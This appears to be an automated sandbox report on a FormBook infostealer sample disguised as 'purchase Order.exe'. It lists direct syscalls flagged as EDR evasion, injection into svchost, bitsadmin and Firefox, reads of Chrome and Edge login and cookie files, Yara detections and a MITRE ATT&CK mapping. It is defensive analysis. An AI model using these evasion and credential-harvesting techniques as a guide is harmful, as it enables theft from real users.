Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]	2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037309AD mov eax, dword ptr fs:[00000030h]	2_2_037309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037309AD mov eax, dword ptr fs:[00000030h]	2_2_037309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BE872 mov eax, dword ptr fs:[00000030h]	2_2_037BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BE872 mov eax, dword ptr fs:[00000030h]	2_2_037BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C6870 mov eax, dword ptr fs:[00000030h]	2_2_037C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C6870 mov eax, dword ptr fs:[00000030h]	2_2_037C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03760854 mov eax, dword ptr fs:[00000030h]	2_2_03760854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03734859 mov eax, dword ptr fs:[00000030h]	2_2_03734859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03734859 mov eax, dword ptr fs:[00000030h]	2_2_03734859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03742840 mov ecx, dword ptr fs:[00000030h]	2_2_03742840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]	2_2_03752835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]	2_2_03752835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]	2_2_03752835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03752835 mov ecx, dword ptr fs:[00000030h]	2_2_03752835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]	2_2_03752835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]	2_2_03752835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376A830 mov eax, dword ptr fs:[00000030h]	2_2_0376A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D483A mov eax, dword ptr fs:[00000030h]	2_2_037D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D483A mov eax, dword ptr fs:[00000030h]	2_2_037D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BC810 mov eax, dword ptr fs:[00000030h]	2_2_037BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0376C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0376C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FA8E4 mov eax, dword ptr fs:[00000030h]	2_2_037FA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E8C0 mov eax, dword ptr fs:[00000030h]	2_2_0375E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BC89D mov eax, dword ptr fs:[00000030h]	2_2_037BC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03730887 mov eax, dword ptr fs:[00000030h]	2_2_03730887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375AF69 mov eax, dword ptr fs:[00000030h]	2_2_0375AF69
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375AF69 mov eax, dword ptr fs:[00000030h]	2_2_0375AF69
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D2F60 mov eax, dword ptr fs:[00000030h]	2_2_037D2F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D2F60 mov eax, dword ptr fs:[00000030h]	2_2_037D2F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372CF50 mov eax, dword ptr fs:[00000030h]	2_2_0372CF50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372CF50 mov eax, dword ptr fs:[00000030h]	2_2_0372CF50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372CF50 mov eax, dword ptr fs:[00000030h]	2_2_0372CF50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372CF50 mov eax, dword ptr fs:[00000030h]	2_2_0372CF50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372CF50 mov eax, dword ptr fs:[00000030h]	2_2_0372CF50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372CF50 mov eax, dword ptr fs:[00000030h]	2_2_0372CF50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376CF50 mov eax, dword ptr fs:[00000030h]	2_2_0376CF50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D0F50 mov eax, dword ptr fs:[00000030h]	2_2_037D0F50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B4F40 mov eax, dword ptr fs:[00000030h]	2_2_037B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B4F40 mov eax, dword ptr fs:[00000030h]	2_2_037B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B4F40 mov eax, dword ptr fs:[00000030h]	2_2_037B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B4F40 mov eax, dword ptr fs:[00000030h]	2_2_037B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D4F42 mov eax, dword ptr fs:[00000030h]	2_2_037D4F42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375EF28 mov eax, dword ptr fs:[00000030h]	2_2_0375EF28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03732F12 mov eax, dword ptr fs:[00000030h]	2_2_03732F12
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03804FE7 mov eax, dword ptr fs:[00000030h]	2_2_03804FE7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376CF1F mov eax, dword ptr fs:[00000030h]	2_2_0376CF1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E6F00 mov eax, dword ptr fs:[00000030h]	2_2_037E6F00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03770FF6 mov eax, dword ptr fs:[00000030h]	2_2_03770FF6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03770FF6 mov eax, dword ptr fs:[00000030h]	2_2_03770FF6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03770FF6 mov eax, dword ptr fs:[00000030h]	2_2_03770FF6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03770FF6 mov eax, dword ptr fs:[00000030h]	2_2_03770FF6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E6FF7 mov eax, dword ptr fs:[00000030h]	2_2_037E6FF7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374CFE0 mov eax, dword ptr fs:[00000030h]	2_2_0374CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374CFE0 mov eax, dword ptr fs:[00000030h]	2_2_0374CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372EFD8 mov eax, dword ptr fs:[00000030h]	2_2_0372EFD8

Source: C:\Users\user\Desktop\purchase Order.exe

Code function: 0_2_00C7A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00C7A66C

Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C68189 SetUnhandledExceptionFilter,		0_2_00C68189
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C681AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_00C681AC

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe	NtProtectVirtualMemory: Direct from: 0x77542F9C	Jump to behavior
Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe	NtSetInformationProcess: Direct from: 0x77542C5C	Jump to behavior
Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe	NtOpenKeyEx: Direct from: 0x77542B9C	Jump to behavior
Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe	NtProtectVirtualMemory: Direct from: 0x77537B2E	Jump to behavior
Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe	NtCreateFile: Direct from: 0x77542FEC	Jump to behavior
Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe	NtOpenFile: Direct from: 0x77542DCC	Jump to behavior
Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe	NtQueryInformationToken: Direct from: 0x77542CAC	Jump to behavior
Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe	NtTerminateThread: Direct from: 0x77542FCC	Jump to behavior
Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe	NtDeviceIoControlFile: Direct from: 0x77542AEC	Jump to behavior
Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe	NtQueryValueKey: Direct from: 0x77542BEC	Jump to behavior
Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe	NtQueryVolumeInformationFile: Direct from: 0x77542F2C	Jump to behavior
Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe	NtOpenSection: Direct from: 0x77542E0C	Jump to behavior
Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe	NtAllocateVirtualMemory: Direct from: 0x775448EC	Jump to behavior
Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe	NtSetInformationThread: Direct from: 0x775363F9	Jump to behavior
Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe	NtQuerySystemInformation: Direct from: 0x775448CC	Jump to behavior
Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe	NtClose: Direct from: 0x77542B6C
Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe	NtReadVirtualMemory: Direct from: 0x77542E8C	Jump to behavior
Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe	NtCreateKey: Direct from: 0x77542C6C	Jump to behavior
Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe	NtSetInformationThread: Direct from: 0x77542B4C	Jump to behavior
Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe	NtQueryAttributesFile: Direct from: 0x77542E6C	Jump to behavior
Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe	NtOpenKeyEx: Direct from: 0x77543C9C	Jump to behavior
Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe	NtCreateUserProcess: Direct from: 0x7754371C	Jump to behavior
Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe	NtQueryInformationProcess: Direct from: 0x77542C26	Jump to behavior
Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe	NtResumeThread: Direct from: 0x77542FBC	Jump to behavior
Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe	NtWriteVirtualMemory: Direct from: 0x7754490C	Jump to behavior
Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe	NtDelayExecution: Direct from: 0x77542DDC	Jump to behavior
Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe	NtAllocateVirtualMemory: Direct from: 0x77542BFC	Jump to behavior
Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe	NtReadFile: Direct from: 0x77542ADC	Jump to behavior
Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe	NtQuerySystemInformation: Direct from: 0x77542DFC	Jump to behavior
Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe	NtResumeThread: Direct from: 0x775436AC	Jump to behavior
Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe	NtNotifyChangeKey: Direct from: 0x77543C2C	Jump to behavior
Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe	NtCreateMutant: Direct from: 0x775435CC	Jump to behavior
Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe	NtWriteVirtualMemory: Direct from: 0x77542E3C	Jump to behavior
Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe	NtMapViewOfSection: Direct from: 0x77542D1C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\purchase Order.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\bitsadmin.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: NULL target: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: NULL target: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\bitsadmin.exe

Thread register set: target process: 2376

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\bitsadmin.exe

Thread APC queued: target process: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\purchase Order.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: B61008

Jump to behavior

Source: C:\Users\user\Desktop\purchase Order.exe

Code function: 0_2_00C7B106 LogonUserW,

0_2_00C7B106

Source: C:\Users\user\Desktop\purchase Order.exe

Code function: 0_2_00C43D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00C43D19

Source: C:\Users\user\Desktop\purchase Order.exe

Code function: 0_2_00C8411C SendInput,keybd_event,

0_2_00C8411C

Source: C:\Users\user\Desktop\purchase Order.exe

Code function: 0_2_00C874E7 mouse_event,

0_2_00C874E7

Source: C:\Users\user\Desktop\purchase Order.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\purchase Order.exe"	Jump to behavior
Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe	Process created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\SysWOW64\bitsadmin.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\purchase Order.exe

0_2_00C7A66C

Source: C:\Users\user\Desktop\purchase Order.exe

Code function: 0_2_00C871FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00C871FA

Source: McqlvggSSSjC.exe, 00000004.00000000.1543566693.0000000000D91000.00000002.00000001.00040000.00000000.sdmp, McqlvggSSSjC.exe, 00000004.00000002.3221766398.0000000000D91000.00000002.00000001.00040000.00000000.sdmp, McqlvggSSSjC.exe, 00000006.00000002.3221914905.0000000001A11000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: purchase Order.exe, McqlvggSSSjC.exe, 00000004.00000000.1543566693.0000000000D91000.00000002.00000001.00040000.00000000.sdmp, McqlvggSSSjC.exe, 00000004.00000002.3221766398.0000000000D91000.00000002.00000001.00040000.00000000.sdmp, McqlvggSSSjC.exe, 00000006.00000002.3221914905.0000000001A11000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: McqlvggSSSjC.exe, 00000004.00000000.1543566693.0000000000D91000.00000002.00000001.00040000.00000000.sdmp, McqlvggSSSjC.exe, 00000004.00000002.3221766398.0000000000D91000.00000002.00000001.00040000.00000000.sdmp, McqlvggSSSjC.exe, 00000006.00000002.3221914905.0000000001A11000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: purchase Order.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
Source: McqlvggSSSjC.exe, 00000004.00000000.1543566693.0000000000D91000.00000002.00000001.00040000.00000000.sdmp, McqlvggSSSjC.exe, 00000004.00000002.3221766398.0000000000D91000.00000002.00000001.00040000.00000000.sdmp, McqlvggSSSjC.exe, 00000006.00000002.3221914905.0000000001A11000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\purchase Order.exe

Code function: 0_2_00C665C4 cpuid

0_2_00C665C4

Source: C:\Users\user\Desktop\purchase Order.exe

Code function: 0_2_00C9091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,

0_2_00C9091D

Source: C:\Users\user\Desktop\purchase Order.exe

Code function: 0_2_00CBB340 GetUserNameW,

0_2_00CBB340

Source: C:\Users\user\Desktop\purchase Order.exe

Code function: 0_2_00C71E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00C71E8E

Source: C:\Users\user\Desktop\purchase Order.exe

Code function: 0_2_00C5DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00C5DDC0

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3220556041.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3221831734.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3223837018.0000000005850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1621550666.00000000036A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1621140733.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3221901716.0000000003110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3222030300.0000000002E50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1622264740.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\bitsadmin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\bitsadmin.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: purchase Order.exe	Binary or memory string: WIN_81
Source: purchase Order.exe	Binary or memory string: WIN_XP
Source: purchase Order.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
Source: purchase Order.exe	Binary or memory string: WIN_XPe
Source: purchase Order.exe	Binary or memory string: WIN_VISTA
Source: purchase Order.exe	Binary or memory string: WIN_7
Source: purchase Order.exe	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3220556041.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3221831734.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3223837018.0000000005850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1621550666.00000000036A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1621140733.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3221901716.0000000003110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3222030300.0000000002E50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1622264740.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C98C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00C98C4F
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C9923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00C9923B

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	3 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	11 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	2 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	11 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	251 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
